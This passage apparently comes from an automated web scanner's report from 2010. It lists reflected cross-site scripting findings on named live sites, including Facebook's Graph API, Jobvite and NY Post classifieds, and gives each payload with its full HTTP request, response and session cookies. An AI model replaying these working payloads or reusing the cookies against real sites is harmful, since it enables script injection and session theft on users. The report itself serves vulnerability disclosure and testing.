GET /21488703512325bc<img%20src%3da%20onerror%3dalert(1)>b3132b40c0/picture/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "not_found" "(#803) Some of the aliases you requested do not exist: 21488703512325bc<img src=a onerror=alert(1)>b3132b40c0"
Connection: close
Date: Fri, 26 Nov 2010 20:41:18 GMT
Content-Length: 183

{
"error": {
"type": "OAuthException",
"message": "(#803) Some of the aliases you requested do not exist: 21488703512325bc<img src=a onerror=alert(1)>b3132b40c0"
}
}

1.76. http://graph.facebook.com/21488703512/picture/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /21488703512/picture/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92bff<script>alert(1)</script>dea8e2a2b80 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /21488703512/picture92bff<script>alert(1)</script>dea8e2a2b80/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 400 Bad Request
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown path components: /picture92bff<script>alert(1)</script>dea8e2a2b80/"
Connection: close
Date: Fri, 26 Nov 2010 20:41:18 GMT
Content-Length: 149

{
"error": {
"type": "OAuthException",
"message": "Unknown path components: /picture92bff<script>alert(1)</script>dea8e2a2b80/"
}
}

1.77. http://graph.facebook.com/21488703512/picture/ [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /21488703512/picture/

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload 2f219<script>alert(1)</script>88946a24d08 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /21488703512/picture/?type=square2f219<script>alert(1)</script>88946a24d08 HTTP/1.1
Host: graph.facebook.com
Proxy-Connection: keep-alive
Referer: http://apartments.classifieds.nypost.com/for-rent/apartments-for-rent/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; lu=ggftxSNqSz1U2scgA_0e4w5A; c_user=100001495440690; sct=1289346776; sid=1; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; wd=295x25

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unsupported type, 'square2f219<script>alert(1)</script>88946a24d08'. Supported types: small, normal, large, square"
X-Cnection: close
Date: Fri, 26 Nov 2010 20:49:16 GMT
Content-Length: 184

{
"error": {
"type": "Exception",
"message": "Unsupported type, 'square2f219<script>alert(1)</script>88946a24d08'. Supported types: small, normal, large, square"
}
}

1.78. http://graph.facebook.com/23418060/picture/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /23418060/picture/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ea3f<img%20src%3da%20onerror%3dalert(1)>06ff2464298 was submitted in the REST URL parameter 1. This input was echoed as 3ea3f<img src=a onerror=alert(1)>06ff2464298 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /234180603ea3f<img%20src%3da%20onerror%3dalert(1)>06ff2464298/picture/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "not_found" "(#803) Some of the aliases you requested do not exist: 234180603ea3f<img src=a onerror=alert(1)>06ff2464298"
Connection: close
Date: Fri, 26 Nov 2010 20:41:18 GMT
Content-Length: 181

{
"error": {
"type": "OAuthException",
"message": "(#803) Some of the aliases you requested do not exist: 234180603ea3f<img src=a onerror=alert(1)>06ff2464298"
}
}

1.79. http://graph.facebook.com/23418060/picture/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /23418060/picture/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 692ff<script>alert(1)</script>20a0b20959 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /23418060/picture692ff<script>alert(1)</script>20a0b20959/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 400 Bad Request
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown path components: /picture692ff<script>alert(1)</script>20a0b20959/"
Connection: close
Date: Fri, 26 Nov 2010 20:41:19 GMT
Content-Length: 148

{
"error": {
"type": "OAuthException",
"message": "Unknown path components: /picture692ff<script>alert(1)</script>20a0b20959/"
}
}

1.80. http://graph.facebook.com/23418060/picture/ [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /23418060/picture/

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload c019e<script>alert(1)</script>795e8c4f361 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /23418060/picture/?type=squarec019e<script>alert(1)</script>795e8c4f361 HTTP/1.1
Host: graph.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.oodle.com/?cc5be%22%3E%3Cscript%3Ealert(1)%3C/script%3E54f964f95d1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; lu=ggftxSNqSz1U2scgA_0e4w5A; c_user=100001495440690; sct=1289346776; sid=1; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; wd=295x25

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unsupported type, 'squarec019e<script>alert(1)</script>795e8c4f361'. Supported types: small, normal, large, square"
X-Cnection: close
Date: Fri, 26 Nov 2010 20:49:20 GMT
Content-Length: 184

{
"error": {
"type": "Exception",
"message": "Unsupported type, 'squarec019e<script>alert(1)</script>795e8c4f361'. Supported types: small, normal, large, square"
}
}

1.81. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1724a</script><script>alert(1)</script>875ecd07757 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CompanyJobs/Careers.aspx?k=Job&c=qOX9Vfwz&j=o6HvVfwX&s=IndeedSponsored&1724a</script><script>alert(1)</script>875ecd07757=1 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vqmcag45nadz14ia3kooz3y4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=025462f0-f27a-4903-9497-a04679211f93; expires=Sun, 26-Dec-2010 20:49:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 20:49:05 GMT
Content-Length: 17279

<html>
<head>
<link href="http://hire.jobvite.com/CompanyJobs/careers_1.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://hire.jobvite.com/CompanyJobs/careers_8.js?v=
...[SNIP]...
<!--
jvurlargs = '?c=qOX9Vfwz&s=IndeedSponsored&1724a</script><script>alert(1)</script>875ecd07757=1';
jvurlargsclean = '?c=qOX9Vfwz&s=IndeedSponsored&1724a</script>
...[SNIP]...

1.82. http://hire.jobvite.com/CompanyJobs/Job.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Job.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dddb1</script><script>alert(1)</script>ff1e578fabf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CompanyJobs/Job.aspx?c=qOX9Vfwz&j=o6HvVfwX&s=IndeedSponsored&dddb1</script><script>alert(1)</script>ff1e578fabf=1 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=chxkbbebtvz5hb45ss15xpqd; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=4a3e2b8c-51a0-44e0-9c34-69404e8260d9; expires=Sun, 26-Dec-2010 20:50:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 20:50:17 GMT
Content-Length: 17279

<html>
<head>
<link href="http://hire.jobvite.com/CompanyJobs/careers_1.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://hire.jobvite.com/CompanyJobs/careers_8.js?v=
...[SNIP]...
<!--
jvurlargs = '?c=qOX9Vfwz&s=IndeedSponsored&dddb1</script><script>alert(1)</script>ff1e578fabf=1';
jvurlargsclean = '?c=qOX9Vfwz&s=IndeedSponsored&dddb1</script>
...[SNIP]...

1.83. http://img.pulsemgr.com/script/pm/100/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /script/pm/100/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29c84"-alert(1)-"471c5bcaf02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /script/pm/100/?29c84"-alert(1)-"471c5bcaf02=1 HTTP/1.1
Host: img.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://www.overstock.com/Home-Garden/Nottingham-Brown-Bonded-Leather-Folding-Storage-Ottoman/4783826/product.html?bd49a%22style%3d%22x%3aexpression(alert(document.cookie))%22b5b8b6cc345=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:50:25 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: public, max-age=86400
ETag: "747a6a-23-83494e76ada62"
Set-Cookie: c=1; domain=.pulsemgr.com; path=/; expires=Sun, 18 Jan 2038 00:00:00 GMT
P3P: policyref="http://img.pulsemgr.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Connection: close
Content-Type: text/javascript
Content-Length: 6956

var pulse = {};
pulse.values = {};
pulse.site = {}
pulse.baseParams = "";
pulse.baseParams0 = "29c84"-alert(1)-"471c5bcaf02=1";
pulse.imgs=new Array();

function gup(url, param) {
if (url.indexOf("?")<0) url = "?"+url;
if (url.indexOf("#")<0) url = url+"#";
var regex = new RegExp("[\?&]"+param+"(=(.*?))?[&#]");
var
...[SNIP]...

1.84. http://jobs.classifieds.nypost.com/ajax/ping/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.classifieds.nypost.com
Path:   /ajax/ping/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29b25"-alert(1)-"ccf6f1bef9a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax/ping29b25"-alert(1)-"ccf6f1bef9a/ HTTP/1.1
Host: jobs.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 21:13:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNjAxMjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
;
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-newdomain";
cmSetProduction();
cmCreateErrorTag("nonclassifieds ajax/ping29b25"-alert(1)-"ccf6f1bef9a/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-newdomain");
</script>
...[SNIP]...

1.85. http://jobs.classifieds.nypost.com/ajax/ping/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.classifieds.nypost.com
Path:   /ajax/ping/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0bf"><script>alert(1)</script>497d65f7458 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ajax/pingad0bf"><script>alert(1)</script>497d65f7458/ HTTP/1.1
Host: jobs.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 21:13:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNjAxMjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://jobs.oodle.com/ajax/pingad0bf"><script>alert(1)</script>497d65f7458/" />
...[SNIP]...

1.86. http://jobs.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.classifieds.nypost.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae45"><script>alert(1)</script>6f3f69c9f67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post/?2ae45"><script>alert(1)</script>6f3f69c9f67=1 HTTP/1.1
Host: jobs.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:56:10 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDk3MDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://jobs.oodle.com/post/?2ae45"><script>alert(1)</script>6f3f69c9f67=1" />
...[SNIP]...

1.87. http://jobs.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.classifieds.nypost.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87f71"-alert(1)-"822c074fa59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /post/?87f71"-alert(1)-"822c074fa59=1 HTTP/1.1
Host: jobs.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:56:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDk3MTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
-post-_--_--_--_--_--_--_-newdomain";
odl.reporting.replyExtraFields = "ny-_-post-_-post-_--_-nypost-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-newdomain";
cmSetProduction();
cmCreatePageviewTag("post ?87f71"-alert(1)-"822c074fa59=1","10000023","","","ny-_-post-_-post-_-nypost USA-_-nypost-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-newdomain");
</script>
...[SNIP]...

1.88. http://jobs.classifieds.nypost.com/regions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.classifieds.nypost.com
Path:   /regions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5236"-alert(1)-"5fe9f1e64d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

